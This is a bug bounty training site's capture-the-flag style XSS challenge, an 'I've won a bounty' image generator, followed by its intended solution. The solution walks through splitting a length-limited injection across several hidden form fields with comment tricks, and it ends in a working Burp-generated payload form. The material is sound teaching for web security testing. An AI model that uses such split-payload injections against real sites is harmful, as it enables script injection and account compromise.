Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.
Failure to abide by the rules will put you at risk of being restricted from using our free challenges.
"I've won a bounty" generator
Cross Site Scripting (XSS)
We know people love to say they've some bounties so simply input your username & bounty amount and then generate your image!
Can you discover how the application works and if there's anything interesting happening? Perhaps there is XSS somewhere hidden here.
Completed the challenge?
You can browse the intended solution to this challenge below.
Firstly you'll notice that the
bounty amount value must be an integer, so it won't be vulnerable to anything interesting, but what else is sent with the request?
Currency and platform.
First we test each parameter for basic XSS tests with ">.
Which gives us in the response:
<input type="hidden" name="currency" value="dollar">">
<input type="hidden" name="platform" value="hackerone">">
currency are vulnerable to XSS. So let's just try
"><svg/onload=alert(0)>. Easy , right?
<input type="hidden" name="currency" value="test"><svg/o">
<div class="top-right" style="margin-top:25px;">
<input type="hidden" name="platform" value="test"><svg/on">
Hmm, it's restricting the length of our payload. So what can we do?
currency is reflected first, we set this to
/* characters will comment out anything else below, so what's next?
username! Ahh yes, it may not be vulnerable to XSS, but I can still add something like:
*/ alert(0) /*. This will uncomment, alert, and re-comment.
Okay, lastly we need to end the comment and script tag. If we try
platform=*/</script> then you'll discover it's replaced to
Final working payload:
<!-- CSRF PoC - generated by Burp Suite Professional -->
<script>history.pushState('', '', '/')</script>
<form action="https://www.bugbountytraining.com/challenges/challenge-11.php" method="POST" target="_blank">
<input type="hidden" name="username" value="*/alert(0)/*" />
<input type="hidden" name="bountyamnt" value="100" />
<input type="hidden" name="platform" value="*/</script/x>" />
<input type="hidden" name="currency" value=""><script>/*" />
<input type="submit" value="Submit request" />